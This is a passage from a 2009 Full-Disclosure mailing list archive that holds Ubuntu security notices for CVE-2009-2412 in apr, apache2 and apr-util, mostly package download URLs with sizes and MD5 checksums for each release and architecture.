http://ports.ubuntu.com/pool/main/s/subversion/libsvn-dev_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 1022882 d45f4f6e80506d65d84178016cba3d1d http://ports.ubuntu.com/pool/main/s/subversion/libsvn-perl_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 1076620 0139b77051f0fd50312e8bef95f67f11 http://ports.ubuntu.com/pool/main/s/subversion/libsvn1_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 685732 b4aa3aa4874bd69916a4e3e5b9a3492e http://ports.ubuntu.com/pool/main/s/subversion/python-subversion-dbg_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 3669670 69ee4d72ca3611c564fc3c3695d46b7a http://ports.ubuntu.com/pool/main/s/subversion/python-subversion_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 1022756 df315994ce27914c9ff0a55b487bc9ac http://ports.ubuntu.com/pool/main/s/subversion/subversion_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 339718 846aa4fa65aca7cb37e025285499896f http://ports.ubuntu.com/pool/universe/s/subversion/libapache2-svn_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 147624 815092a97d0e8185578cca0cc7593dde http://ports.ubuntu.com/pool/universe/s/subversion/libsvn-java_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 275404 6169e5c09ce60f7a15c481d003924d19 http://ports.ubuntu.com/pool/universe/s/subversion/libsvn-ruby1.8_1.5.4dfsg1-1ubuntu2.1_sparc.deb Size/MD5: 494018 e69e012267eb9720e8f19d5a040d0c1f -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090807/833f8fea/attachment.bin From jamie at canonical.com Sat Aug 8 01:57:13 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Fri, 7 Aug 2009 19:57:13 -0500 Subject: [Full-disclosure] [USN-813-1] apr vulnerability Message-ID: <20090808005713.GB2318@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-813-1 August 08, 2009 apr vulnerability CVE-2009-2412 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libapr1 1.2.11-1ubuntu0.1 Ubuntu 8.10: libapr1 1.2.12-4ubuntu0.1 Ubuntu 9.04: libapr1 1.2.12-5ubuntu0.1 After a standard system upgrade you need to restart any applications using apr, such as Subversion and Apache, to effect the necessary changes. Details follow: Matt Lewis discovered that apr did not properly sanitize its input when allocating memory. If an application using apr processed crafted input, a remote attacker could cause a denial of service or potentially execute arbitrary code as the user invoking the application. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.11-1ubuntu0.1.diff.gz Size/MD5: 15611 add923c3313d739b3f20f207f71c73d8 http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.11-1ubuntu0.1.dsc Size/MD5: 1125 80e494c58542be8b4d0294bd7e59dc13 http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.11.orig.tar.gz Size/MD5: 1114033 afcf9541dc31551abeb6c53bb42c2596 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dbg_1.2.11-1ubuntu0.1_amd64.deb Size/MD5: 194610 716922eb0712a07fed068fcb925772c1 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dev_1.2.11-1ubuntu0.1_amd64.deb Size/MD5: 788200 a69f65f1e8aeb641aca3a249a842ce28 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1_1.2.11-1ubuntu0.1_amd64.deb Size/MD5: 117152 6413342ab115ccb57a59680e4ad40d6f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dbg_1.2.11-1ubuntu0.1_i386.deb Size/MD5: 189048 d59218dc9160e0bb0470563333173d04 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dev_1.2.11-1ubuntu0.1_i386.deb Size/MD5: 776116 4446e1f5e8ce9926cda8fc5c3f20e17c http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1_1.2.11-1ubuntu0.1_i386.deb Size/MD5: 113026 67a51cd1f86be2d432f4d1a5f286eebf lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.11-1ubuntu0.1_lpia.deb Size/MD5: 190698 52f49994e4febd9fc97e15519decea0e http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.11-1ubuntu0.1_lpia.deb Size/MD5: 775518 0e7976961d9ce279db79ba14775107f9 http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.11-1ubuntu0.1_lpia.deb Size/MD5: 111342 74f98528ff681564b8c69beead400bd6 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.11-1ubuntu0.1_powerpc.deb Size/MD5: 195426 d8c12007029f0cf180a86f42e79ded57 http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.11-1ubuntu0.1_powerpc.deb Size/MD5: 787514 a553507d0ed7ed8afc9d2a9fc866eb70 http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.11-1ubuntu0.1_powerpc.deb Size/MD5: 123062 9a90160cdc43792ce2bc49df4ae91865 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.11-1ubuntu0.1_sparc.deb Size/MD5: 175976 9cc036cfae077abd1ac467af6bd790c1 http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.11-1ubuntu0.1_sparc.deb Size/MD5: 776780 5117cf23995948387b6fb14b68431ae6 http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.11-1ubuntu0.1_sparc.deb Size/MD5: 108894 a4427541fc8b13d0a9b89fbaba2a434a Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.12-4ubuntu0.1.diff.gz Size/MD5: 12533 057d9b6e04b87b71e9518d53de61b659 http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.12-4ubuntu0.1.dsc Size/MD5: 1384 58b855b6bfd0504326eb02fa5dd9f6e9 http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.12.orig.tar.gz Size/MD5: 1127522 020ea947446dca2d1210c099c7a4c837 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dbg_1.2.12-4ubuntu0.1_amd64.deb Size/MD5: 53468 eb68dda90aed2dfd1e9c55766dd4d424 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dev_1.2.12-4ubuntu0.1_amd64.deb Size/MD5: 785202 d7f1e3477f79d4433b9390411b814073 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1_1.2.12-4ubuntu0.1_amd64.deb Size/MD5: 113952 92d67e89dcf26a5bc02d98bf86fc22f9 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dbg_1.2.12-4ubuntu0.1_i386.deb Size/MD5: 53464 c3dd60a4f092291b562ba212e3f60da7 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dev_1.2.12-4ubuntu0.1_i386.deb Size/MD5: 772414 6001d74f8ec3772706b267410321fb3d http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1_1.2.12-4ubuntu0.1_i386.deb Size/MD5: 108752 0bfab5d3b02547e5690d766393336d1e lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.12-4ubuntu0.1_lpia.deb Size/MD5: 53444 2b5634382952fa49c759c1a4d4073f20 http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.12-4ubuntu0.1_lpia.deb Size/MD5: 771794 f5be7e04e8e49a952f331d1c51d0dfa3 http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.12-4ubuntu0.1_lpia.deb Size/MD5: 106786 14eec6bff97d98911d5aae1f7e6b6e42 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.12-4ubuntu0.1_powerpc.deb Size/MD5: 54804 a629d5b1784683de60bad9fd3347ec0b http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.12-4ubuntu0.1_powerpc.deb Size/MD5: 781506 c31d8fbad695f3444247605e8735f417 http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.12-4ubuntu0.1_powerpc.deb Size/MD5: 115848 eca448cd2d24d9033052644c6e6699fd sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.12-4ubuntu0.1_sparc.deb Size/MD5: 54124 1f20ab360c8423cc0f23e703a49258f8 http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.12-4ubuntu0.1_sparc.deb Size/MD5: 778254 592362c830dc1dbe4a11891014aa3d79 http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.12-4ubuntu0.1_sparc.deb Size/MD5: 109060 e7fe5915bedd748ea1fae929b7744ebc Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.12-5ubuntu0.1.diff.gz Size/MD5: 12392 dad717ee3cf5ee5a51f4557e107f7f0b http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.12-5ubuntu0.1.dsc Size/MD5: 1384 282ecf985e0843d0790a6faad28bf08e http://security.ubuntu.com/ubuntu/pool/main/a/apr/apr_1.2.12.orig.tar.gz Size/MD5: 1127522 020ea947446dca2d1210c099c7a4c837 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dbg_1.2.12-5ubuntu0.1_amd64.deb Size/MD5: 53506 6614950fdda2e501f6e08cb72e1fc7f8 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dev_1.2.12-5ubuntu0.1_amd64.deb Size/MD5: 785976 a55e34fc1c8dfdfd18c258b734562d16 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1_1.2.12-5ubuntu0.1_amd64.deb Size/MD5: 114016 c06eaa80d78148669a99b0baba6e233a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dbg_1.2.12-5ubuntu0.1_i386.deb Size/MD5: 53502 9cfdb6c1d30317b66e82237f204e945b http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1-dev_1.2.12-5ubuntu0.1_i386.deb Size/MD5: 773486 96be1dd29735870a80385217fe443363 http://security.ubuntu.com/ubuntu/pool/main/a/apr/libapr1_1.2.12-5ubuntu0.1_i386.deb Size/MD5: 108822 5de07e4a316394e2347a3cd2b6f68cf4 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.12-5ubuntu0.1_lpia.deb Size/MD5: 53480 5e3f7e68d7492e5b8c0821d9fc873513 http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.12-5ubuntu0.1_lpia.deb Size/MD5: 772806 fb8c2e67ac688a9ec4e3ce23874f2acd http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.12-5ubuntu0.1_lpia.deb Size/MD5: 106850 b0e1853de388ba71b0f2a8c5539be9cf powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.12-5ubuntu0.1_powerpc.deb Size/MD5: 54828 de1be5158a85c5e33e510329f2e571e1 http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.12-5ubuntu0.1_powerpc.deb Size/MD5: 782358 5e69131b4a32e3e5ce9abc5e8503599f http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.12-5ubuntu0.1_powerpc.deb Size/MD5: 115900 55d92b74d725f6d80a3848e9a3b7723e sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/a/apr/libapr1-dbg_1.2.12-5ubuntu0.1_sparc.deb Size/MD5: 54170 2d5973180a33b09b336698718be07238 http://ports.ubuntu.com/pool/main/a/apr/libapr1-dev_1.2.12-5ubuntu0.1_sparc.deb Size/MD5: 779146 ec3ab918bbf8e8a758b95137cd371a89 http://ports.ubuntu.com/pool/main/a/apr/libapr1_1.2.12-5ubuntu0.1_sparc.deb Size/MD5: 109082 2b5b346d2ed2237cc2f782eae01df534 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090807/5f8406b3/attachment.bin From jamie at canonical.com Sat Aug 8 02:06:16 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Fri, 7 Aug 2009 20:06:16 -0500 Subject: [Full-disclosure] [USN-813-2] Apache vulnerability Message-ID: <20090808010616.GA2695@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-813-2 August 08, 2009 apache2 vulnerability CVE-2009-2412 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libapr0 2.0.55-4ubuntu2.7 After a standard system upgrade you need to restart any applications using apr, such as Subversion and Apache, to effect the necessary changes. Details follow: USN-813-1 fixed vulnerabilities in apr. This update provides the corresponding updates for apr as provided by Apache on Ubuntu 6.06 LTS. Original advisory details: Matt Lewis discovered that apr did not properly sanitize its input when allocating memory. If an application using apr processed crafted input, a remote attacker could cause a denial of service or potentially execute arbitrary code as the user invoking the application. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.7.diff.gz Size/MD5: 126010 68da83341313e1b166fe345138d1eaa5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.7.dsc Size/MD5: 1156 0b17c48d0880ab82c769c41d1aff7002 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.7_all.deb Size/MD5: 2125530 9356b79c2b1591ffec1a6cd1974f82fd amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 833902 08b8aaf66aa52e6fd9dbed1647bb5dd2 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 229124 400d32297652e4976456cb7b367cc435 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 224122 07be7749fd618703c9f093efeb5e6fad http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 228700 9c79315063121eb7017cd99c6bb4667c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 172244 e15a994901f09e6e8294d656b8a8254c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 173028 985f0a987b0e5e17b24fdd6f8475781a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 95066 2b836251f30a5c3d0cb24c2775a9b997 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 37096 2756f162320b3b183c7447dad130cff9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 286664 f46d70c05cba04ceaba7d62afe5ac5be http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.7_amd64.deb Size/MD5: 145234 e1c285b96d1ee5e8a66d01eadcc289c6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 787150 ab3e75481087dc0148ca3ccc450a1ab1 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 203722 e10938af36f0e1802fbd3b0946ae6e3c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 199634 7ee8d5ba9679c8c7dd78c95b5fb74046 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 203146 5456087e20afd24d2a27d648fafeb135 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 172228 98a58d9526a667a05573e9b26fcfd45b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 173020 1db636c0e79b0ea3c405da958c35c932 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 92998 737aee7a7026d4d9b33a0f71b44e0b19 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 37098 15db8827569af434025942a84e77b381 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 262652 93f2171d69072153264cab51860f781c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.7_i386.deb Size/MD5: 133118 cac6f1c804a1e34bf4250be4d8670862 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 859954 558399d0c5fb22cee0cdc1b20d4d7586 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 221090 94c5789d3d06b3553d883eca45ab06b7 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 216702 68edfa60eb9de377b20be68e10bd879a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 220634 8f103f83772eb2e52cd38bb0fb1efbec http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 172234 559b5683e44f424324d43b09f42c63f6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 173014 7c05a2f5fe626036ebaa271cece0cd09 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 104772 63a31e0f30472ebc19a79744b1b1fe03 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 37098 c00f5d32432f97ac992652ac1bbb7259 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 282244 1a2c7d7038b335ae2ab6ff68d06a380f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.7_powerpc.deb Size/MD5: 142328 169a4ce5fc42eb789c76f46acb07aa00 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 804250 3a780a65322c539717e93a64792acc16 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 211276 e1f45226511664f1759a6ad75aff6155 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 206948 19e2792273d8a4935ef6fcc6ee369326 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 210556 e62136b10dca8c665defa2cc54640e64 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 172232 6e2213cb4b6a5dec1506fe01ce5cc028 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 173010 9603ee752f034d04fd349db168fbe2f2 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 94084 c6f6315ff2e1865f409ae49d54e3a233 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 37102 fdb3a44756f9d6e8d36c1b2558420d57 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 268648 03fbe81b3cc1f0ac17961fc5c58a3f5f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.7_sparc.deb Size/MD5: 131056 8707670bfb577280d9b5d0689c51608c -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090807/15c399c2/attachment.bin From jamie at canonical.com Sat Aug 8 06:56:47 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Sat, 8 Aug 2009 00:56:47 -0500 Subject: [Full-disclosure] [USN-813-3] apr-util vulnerability Message-ID: <20090808055647.GA6414@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-813-3 August 08, 2009 apr-util vulnerability CVE-2009-2412 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libaprutil1 1.2.12+dfsg-3ubuntu0.2 Ubuntu 8.10: libaprutil1 1.2.12+dfsg-7ubuntu0.3 Ubuntu 9.04: libaprutil1 1.2.12+dfsg-8ubuntu0.3 After a standard system upgrade you need to restart any applications using apr-util, such as Subversion and Apache, to effect the necessary changes. Details follow: USN-813-1 fixed vulnerabilities in apr. This update provides the corresponding updates for apr-util. Original advisory details: Matt Lewis discovered that apr did not properly sanitize its input when allocating memory. If an application using apr processed crafted input, a remote attacker could cause a denial of service or potentially execute arbitrary code as the user invoking the application. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg-3ubuntu0.2.diff.gz Size/MD5: 25223 c491683a8eafa49c7405a3f300e65121 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg-3ubuntu0.2.dsc Size/MD5: 1324 88ae14ce33166e372cdd6f8bcf613f92 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg.orig.tar.gz Size/MD5: 658687 4ef3e41037fe0cdd3a0d107335a008eb amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-3ubuntu0.2_amd64.deb Size/MD5: 133304 e29516cb4b454f1c3cd325e5cbe39cb4 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-3ubuntu0.2_amd64.deb Size/MD5: 129976 8f85bb63ecb4065a80b1b88ba8d76948 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-3ubuntu0.2_amd64.deb Size/MD5: 76016 4e9115941ed9159e504184ca13aa90e4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-3ubuntu0.2_i386.deb Size/MD5: 126510 2da368c73ee8f98b5dab99e1709f1156 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-3ubuntu0.2_i386.deb Size/MD5: 119570 3d2ae02052a2b86d26aaf2f33c412a33 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-3ubuntu0.2_i386.deb Size/MD5: 70528 388a8676998117644995e177f5936bbe lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-3ubuntu0.2_lpia.deb Size/MD5: 128320 dabf57ad0cecb8fcd89fe727ed3dc31b http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-3ubuntu0.2_lpia.deb Size/MD5: 119216 45a38f1b5754562d783f75d24210c74d http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-3ubuntu0.2_lpia.deb Size/MD5: 69700 4da2de6469a2986eaa1a6a83189424ea powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-3ubuntu0.2_powerpc.deb Size/MD5: 134052 317a3362a63bac3e6968793b1bae8772 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-3ubuntu0.2_powerpc.deb Size/MD5: 130390 6a22f60dd54ebb4905f32c7e25d016a7 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-3ubuntu0.2_powerpc.deb Size/MD5: 80238 46514a01aafcaf4c2f9403aecec2ee67 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-3ubuntu0.2_sparc.deb Size/MD5: 120272 ff0c69402549737e9ded54e1f8121183 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-3ubuntu0.2_sparc.deb Size/MD5: 124284 e4f8d6fb63c40e2c7e1f76c17e731ae7 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-3ubuntu0.2_sparc.deb Size/MD5: 71220 c9e3d018c2c90ff0df35076ce9cc61c9 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg-7ubuntu0.3.diff.gz Size/MD5: 26056 681e0a17fbbc73c4df8039af9c9bf39b http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg-7ubuntu0.3.dsc Size/MD5: 1632 0b733d35b65cbaa590106f5439a3d60c http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg.orig.tar.gz Size/MD5: 658687 4ef3e41037fe0cdd3a0d107335a008eb amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-7ubuntu0.3_amd64.deb Size/MD5: 150926 f84b953448992901f397163370ea50cb http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-7ubuntu0.3_amd64.deb Size/MD5: 136498 5aacc2b07791b3bd829ac7f86acd339c http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-7ubuntu0.3_amd64.deb Size/MD5: 82582 c9026cdd489cd35e370ba77d2340b61a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-7ubuntu0.3_i386.deb Size/MD5: 144188 37a2d20a24036401f18fda98f305f707 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-7ubuntu0.3_i386.deb Size/MD5: 124918 ab9e5a80eadcc83a56fa79947bcf50d2 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-7ubuntu0.3_i386.deb Size/MD5: 75948 f60d59dc4dfae7642759e9e04836a043 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-7ubuntu0.3_lpia.deb Size/MD5: 145568 461f743ee035d1c819e999b7fb285e3d http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-7ubuntu0.3_lpia.deb Size/MD5: 